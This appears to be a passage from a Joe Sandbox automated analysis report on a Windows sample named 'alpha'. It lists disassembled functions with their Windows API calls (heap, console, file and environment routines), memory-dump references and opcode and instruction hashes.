                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcsnicmp$wcschr
                                                                                      • String ID:
                                                                                      • API String ID: 3270668897-0
                                                                                      • Opcode ID: 0c5351208ff2a5a36442746df2c9d56de1180022aab67ae3c28b2a55d3b35da5
                                                                                      • Instruction ID: c41432ba874116d377e0a3b97e43b0d41e68b6863f403c353a7ccdbd77da7d63
                                                                                      • Opcode Fuzzy Hash: 0c5351208ff2a5a36442746df2c9d56de1180022aab67ae3c28b2a55d3b35da5
                                                                                      • Instruction Fuzzy Hash: DE516D51E0C64281FBB9BF3194911B9A3A9EF4DB80FD89132CA4E276D5DF2CE9419370
                                                                                      Function 00007FF79376F358 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$DriveFullNamePathType
                                                                                      • String ID:
                                                                                      • API String ID: 3442494845-0
                                                                                      • Opcode ID: 96e94011f7e51b9192f665da575d41fb78cf0bd335fa213fa644a3e80f09fdea
                                                                                      • Instruction ID: eaf9ee86ac6483c9a900ca8f1c2d58d17c2e6cb07f9f9efa273f4f38487642d5
                                                                                      • Opcode Fuzzy Hash: 96e94011f7e51b9192f665da575d41fb78cf0bd335fa213fa644a3e80f09fdea
                                                                                      • Instruction Fuzzy Hash: 12319032609BC28AEBB0DF20E8907E9B7A8FB88B88F444035DA4D57B54CF38D605C710
                                                                                      Function 00007FF793758F80 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                      • String ID:
                                                                                      • API String ID: 140117192-0
                                                                                      • Opcode ID: f9503a7e6f26e693eab0e8ec34dcabcd79a91a5ad0fdcc229cb5dec8ce22a0f7
                                                                                      • Instruction ID: 76f30c2dbd24e65a398680cd960a6d99c1cc77b1b5eed149d3cdb4fdbd6cf00d
                                                                                      • Opcode Fuzzy Hash: f9503a7e6f26e693eab0e8ec34dcabcd79a91a5ad0fdcc229cb5dec8ce22a0f7
                                                                                      • Instruction Fuzzy Hash: 7941C935A08B4285EBA0AB28F8C0365B368FB8D745FD04036D98EA37A4DF7DE545C720
                                                                                      Function 00007FF793758470 Relevance: 6.1, APIs: 4, Instructions: 72stringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: wcstol$lstrcmp
                                                                                      • String ID:
                                                                                      • API String ID: 3515581199-0
                                                                                      • Opcode ID: 5b9efed5608bd49f2816daba6a3b85e90b3500fb38e55be3423670eddfbfd6ec
                                                                                      • Instruction ID: 094dfc4e2f6acbda080e3114fc3b65725f70cf3eea344ca7487d6b2536472d66
                                                                                      • Opcode Fuzzy Hash: 5b9efed5608bd49f2816daba6a3b85e90b3500fb38e55be3423670eddfbfd6ec
                                                                                      • Instruction Fuzzy Hash: A321BF32B0864293F7B86F79A0D413AEAA8FB8D741F855135DB8F52794CE6DE8418620
                                                                                      Function 00007FF793744F58 Relevance: 6.1, APIs: 4, Instructions: 72filetimeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: File_get_osfhandle$TimeWrite
                                                                                      • String ID:
                                                                                      • API String ID: 4019809305-0
                                                                                      • Opcode ID: 81587e0329514d19275e074575feb35963da2dd15ba7483d0e323a7e2a39d08e
                                                                                      • Instruction ID: dae2fa7c583771319004a2d0f42c2de0ed75c629d85fc8c60525a89b9d6b4e73
                                                                                      • Opcode Fuzzy Hash: 81587e0329514d19275e074575feb35963da2dd15ba7483d0e323a7e2a39d08e
                                                                                      • Instruction Fuzzy Hash: E531B321A08B4286F7F06B3494D4378EAA9AF4EB64F949238DD4E637D5CF3CD8448711
                                                                                      Function 00007FF793771914 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$DriveNamePathTypeVolume
                                                                                      • String ID:
                                                                                      • API String ID: 1029679093-0
                                                                                      • Opcode ID: d45035a7c6ac09dbba50d0c00beb4f85e1cca4574d2ac4f31282f71e25618f1f
                                                                                      • Instruction ID: d2748621c102169287fe49a915f293aa06a48a4148cb503ec85151dcf19c3a90
                                                                                      • Opcode Fuzzy Hash: d45035a7c6ac09dbba50d0c00beb4f85e1cca4574d2ac4f31282f71e25618f1f
                                                                                      • Instruction Fuzzy Hash: C6313A32705AC18AEBB09F21D8943E8A7A8FB8DB89F844135CA4E5B744DF3CD649C750
                                                                                      Function 00007FF79376E810 Relevance: 6.1, APIs: 4, Instructions: 67fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$DeleteErrorLastWrite_get_osfhandle
                                                                                      • String ID:
                                                                                      • API String ID: 2448200120-0
                                                                                      • Opcode ID: 8b4da8a10e097a17451e285642832c13025bfbcfcba5fc9726ddc1af043f7f21
                                                                                      • Instruction ID: b8f2a7584dfe965da331f445a893854cda8d76e4117ede3e5529c045f62b5573
                                                                                      • Opcode Fuzzy Hash: 8b4da8a10e097a17451e285642832c13025bfbcfcba5fc9726ddc1af043f7f21
                                                                                      • Instruction Fuzzy Hash: 9C218F31A08B4287F7A57B31A49027DFAA9FB8CB91F845135D90E23B85CF3CE4418B61
                                                                                      Function 00007FF793757CF8 Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$AllocProcess
                                                                                      • String ID:
                                                                                      • API String ID: 1617791916-0
                                                                                      • Opcode ID: 42f91e47f3ef5671c9468e2150952d512ccb49b47a4aa8ec2999c576e9d14cb8
                                                                                      • Instruction ID: 87d80e238fb7f5240acecd80a99318c3259e1028ee334585bc7f87be8c119fe0
                                                                                      • Opcode Fuzzy Hash: 42f91e47f3ef5671c9468e2150952d512ccb49b47a4aa8ec2999c576e9d14cb8
                                                                                      • Instruction Fuzzy Hash: 8F21B861608B4196EA64AB71A590079F7A5FF8DBD1B849234CE1F23755DF3CE4018760
                                                                                      Function 00007FF793746A48 Relevance: 6.1, APIs: 4, Instructions: 59memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00007FF793753C24: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF793753D0C
                                                                                        • Part of subcall function 00007FF793753C24: towupper.MSVCRT ref: 00007FF793753D2F
                                                                                        • Part of subcall function 00007FF793753C24: iswalpha.MSVCRT ref: 00007FF793753D4F
                                                                                        • Part of subcall function 00007FF793753C24: towupper.MSVCRT ref: 00007FF793753D75
                                                                                        • Part of subcall function 00007FF793753C24: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF793753DBF
                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF79376EA0F,?,?,?,00007FF79376E925,?,?,?,?,00007FF79374B9B1), ref: 00007FF793746ABF
                                                                                      • RtlFreeHeap.NTDLL ref: 00007FF793746AD3
                                                                                        • Part of subcall function 00007FF793746B84: SetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,00007FF793746AE8,?,?,?,00007FF79376EA0F,?,?,?,00007FF79376E925), ref: 00007FF793746B8B
                                                                                        • Part of subcall function 00007FF793746B84: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,00007FF793746AE8,?,?,?,00007FF79376EA0F,?,?,?,00007FF79376E925), ref: 00007FF793746B97
                                                                                        • Part of subcall function 00007FF793746B84: RtlFreeHeap.NTDLL ref: 00007FF793746BAF
                                                                                        • Part of subcall function 00007FF793746B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF793746AF1,?,?,?,00007FF79376EA0F,?,?,?,00007FF79376E925), ref: 00007FF793746B39
                                                                                        • Part of subcall function 00007FF793746B30: RtlFreeHeap.NTDLL ref: 00007FF793746B4D
                                                                                        • Part of subcall function 00007FF793746B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF793746AF1,?,?,?,00007FF79376EA0F,?,?,?,00007FF79376E925), ref: 00007FF793746B59
                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF79376EA0F,?,?,?,00007FF79376E925,?,?,?,?,00007FF79374B9B1), ref: 00007FF793746B03
                                                                                      • RtlFreeHeap.NTDLL ref: 00007FF793746B17
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$Process$Free$towupper$CurrentDirectoryEnvironmentFullNamePathStringsiswalpha
                                                                                      • String ID:
                                                                                      • API String ID: 3512109576-0
                                                                                      • Opcode ID: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
                                                                                      • Instruction ID: 428d864bd8bd42915d852bdaaddcc61e35cd3b6781fd0fd09ead1e1ade2e0d31
                                                                                      • Opcode Fuzzy Hash: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
                                                                                      • Instruction Fuzzy Hash: 5021E221A08A8286FBA4BB35D4D43B8BBA5EF5DB45F944035CA0E23351DF3CA445C771
                                                                                      Function 00007FF79374B6B0 Relevance: 6.1, APIs: 4, Instructions: 57memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF79374AF82), ref: 00007FF79374B6D0
                                                                                      • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF79374AF82), ref: 00007FF79374B6E7
                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF79374AF82), ref: 00007FF79374B701
                                                                                      • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF79374AF82), ref: 00007FF79374B715
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$Process$AllocSize
                                                                                      • String ID:
                                                                                      • API String ID: 2549470565-0
                                                                                      • Opcode ID: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                                                                      • Instruction ID: 9c73781ac816377fb18e8d3ca9a9e0f8688c92737143333082316fa1b22bb65f
                                                                                      • Opcode Fuzzy Hash: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                                                                      • Instruction Fuzzy Hash: BE21682590978286FAA5AB35E5C4078F6E9FB4CB81BC89436DA4E23750DF3CE941C720
                                                                                      Function 00007FF79376CFF0 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF79375507A), ref: 00007FF79376D01C
                                                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF79375507A), ref: 00007FF79376D033
                                                                                      • FillConsoleOutputAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF79375507A), ref: 00007FF79376D06D
                                                                                      • SetConsoleTextAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF79375507A), ref: 00007FF79376D07F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Console$Attribute$BufferFillHandleInfoOutputScreenText
                                                                                      • String ID:
                                                                                      • API String ID: 1033415088-0
                                                                                      • Opcode ID: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
                                                                                      • Instruction ID: 55458762fe394f7b4b5b63179219d260baa1e86831a1c97bf7380498bc13a5f6
                                                                                      • Opcode Fuzzy Hash: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
                                                                                      • Instruction Fuzzy Hash: 6411B231618A4287EB949B30F09417AF7A4FB8EB95F805135EA8F57B94DF3CD0458B60
                                                                                      Function 00007FF7937459E4 Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00007FF793751EA0: wcschr.MSVCRT(?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF793770D54), ref: 00007FF793751EB3
                                                                                      • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF793745A2E
                                                                                      • _open_osfhandle.MSVCRT ref: 00007FF793745A4F
                                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00008000,?,00000001,00007FF79374260D), ref: 00007FF7937637AA
                                                                                      • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF7937637D2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseCreateErrorFileHandleLast_open_osfhandlewcschr
                                                                                      • String ID:
                                                                                      • API String ID: 22757656-0
                                                                                      • Opcode ID: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
                                                                                      • Instruction ID: f3b49ae40ab725ce03d42889daa5e0ccaddb7305bae61101b0deca79f7ae686a
                                                                                      • Opcode Fuzzy Hash: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
                                                                                      • Instruction Fuzzy Hash: 8A115E71A146458BF7A06B34E4C8379AAA4EB8DB75FA44734D62A073D0CF3CD5498B20
                                                                                      Function 00007FF793765690 Relevance: 6.0, APIs: 4, Instructions: 44memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF793765433,?,?,?,00007FF7937669B8,?,?,?,?,?,00007FF793758C39), ref: 00007FF7937656C5
                                                                                      • RtlFreeHeap.NTDLL ref: 00007FF7937656D9
                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF793765433,?,?,?,00007FF7937669B8,?,?,?,?,?,00007FF793758C39), ref: 00007FF7937656FD
                                                                                      • RtlFreeHeap.NTDLL ref: 00007FF793765711
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$FreeProcess
                                                                                      • String ID:
                                                                                      • API String ID: 3859560861-0
                                                                                      • Opcode ID: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                                                                                      • Instruction ID: 5a03dd05a9e9c318ce3d11853833e6990a13efd7dbd890b12220da3e4d03e6f2
                                                                                      • Opcode Fuzzy Hash: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                                                                                      • Instruction Fuzzy Hash: E5114C72A04B81C6EB109F66E4840ACBBB4F74DF85B888125DB4E13718DF38E556CB90
                                                                                      Function 00007FF793759158 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                      • String ID:
                                                                                      • API String ID: 140117192-0
                                                                                      • Opcode ID: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
                                                                                      • Instruction ID: d2509909780553d24f62160a4af5d2e24403275edabd377d689c316eb0b647d4
                                                                                      • Opcode Fuzzy Hash: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
                                                                                      • Instruction Fuzzy Hash: 7B21F435A08B41C1E7A0AB24F8C0369B7A8FB8D745F900036DA8E63764DF7CE445C720
                                                                                      Function 00007FF793754AD0 Relevance: 6.0, APIs: 4, Instructions: 33memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF793748798), ref: 00007FF793754AD6
